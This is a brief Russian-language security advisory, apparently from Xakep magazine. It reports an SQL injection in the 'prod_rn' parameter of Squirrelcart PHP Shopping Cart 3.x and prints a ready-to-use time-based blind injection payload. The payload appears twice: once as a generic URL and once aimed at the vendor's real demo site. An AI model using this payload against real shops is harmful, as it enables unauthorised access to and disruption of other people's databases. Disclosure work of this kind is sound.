Хакер #305. Многошаговые SQL-инъекции
Программа: Squirrelcart PHP Shopping Cart 3.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "prod_rn" сценарием index.php (когда "add_to_cart"
установлен). Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site/path/index.php?add_to_cart=10&prod_rn=271 AND (SELECT(IF(0x41=0x41,
BENCHMARK(9999999999,NULL),NULL)))
Демонстрация:
http://www.squirrelcart.com/demo1/index.php?add_to_cart=1&prod_rn=271 AND (SELECT(IF(0x41=0x41,
BENCHMARK(9999999999,NULL),NULL)))